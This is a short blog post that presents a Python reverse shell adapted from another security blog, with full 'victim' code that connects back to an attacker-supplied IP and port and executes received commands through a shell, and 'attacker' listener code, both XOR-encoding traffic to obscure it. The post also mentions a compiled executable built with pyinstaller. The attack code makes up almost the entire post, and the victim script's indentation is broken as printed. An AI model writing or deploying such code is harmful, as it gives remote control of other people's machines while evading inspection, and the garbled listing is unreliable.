Monday, June 1, 2015

Python Reverse Shell - Modified from Primal Security Blog (Updated June 5)

The following Python reverse shell is taken from the Primal Security Blog located at the following link:  http://www.primalsecurity.net/0x2-python-tutorial-reverse-shell/

I modified the code so the XOR value, port and IP Addresses can be set as command line options on the server or as options on the client.  As long as the XOR value on the client and the server match the commands will run properly.  How I modified the python was from the information located at the following blog: http://dabeaz.blogspot.com/2010/01/few-useful-bytearray-tricks.html

Server Code (Victim):
#!/usr/bin/python
 
import socket,subprocess,sys

if len(sys.argv) == 4:
 RHOST = sys.argv[1]
 RPORT = sys.argv[2]
 xorkey = sys.argv[3]
 xorkey = int(xorkey)
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((RHOST, int(RPORT)))
 
 while True:
       # recieve XOR encoded data from network socket
       data = s.recv(1024)
       # XOR the data again with a '\x41' to get back to normal data
       en_data = bytearray(data)
       en_data = bytearray(x ^ xorkey for x in en_data)
 
       # Execute the decoded data as a command.  The subprocess module is great because we can PIPE STDOUT/STDERR/STDIN to a variable
       comm = subprocess.Popen(str(en_data), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
       STDOUT, STDERR = comm.communicate()
 
       # Encode the output and send to RHOST
  if STDOUT:
        en_STDOUT = bytearray(STDOUT)
        en_STDOUT = bytearray(x ^ xorkey for x in en_STDOUT)
        s.send(en_STDOUT)
  else:
        en_STDOUT = bytearray("Invalid command...")
        en_STDOUT = bytearray(x ^ xorkey for x in en_STDOUT)
        s.send(en_STDOUT)
 s.close()

else:
 print "Example usage: ./prog   "
 print "The xor key is an integer from 0 to 256"

Client Code (Attacker):
#!/usr/bin/python

import socket
import time

# TCP Reverse Shell using Python
# Adapted from http://www.primalsecurity.net/0x2-python-tutorial-reverse-shell/

# Gather IP Address to Bind to
ipAddr = raw_input('Input Listening IP Address: ')
portNum = raw_input('Input Listening Port: ')
xorkey = raw_input('XOR Key (0-256): ')
xorkey = int(xorkey)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((ipAddr, int(portNum)))
s.listen(2)
print "Listening on port " + portNum + "..."
(client, (ip, port)) = s.accept()
print "Received connection from: " + ip

while True:
 command = raw_input('~$ ')
 if len(command) > 1: 
  encode = bytearray(command)
  encode = bytearray(x ^ xorkey for x in encode)
  client.send(encode)
  outputReceived=''
  while 1:
   en_data=client.recv(1024)
   if len(en_data) < 1024:
    decode = bytearray(en_data)
    decode = bytearray(x ^ xorkey for x in decode)
    outputReceived += decode
    break
   else:
    decode = bytearray(en_data)
    decode = bytearray(x ^ xorkey for x in decode)
    outputReceived += decode
  print outputReceived

client.close()
s.close()


The code for the client, server and a compiled exe using pyinstaller can be found on my google drive at the following link.














at






















Labels:
,


















No comments:















Post a Comment


















        

      









Subscribe to:
Post Comments (Atom)









Test Authentication from Linux Console using python3 pexpect



Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...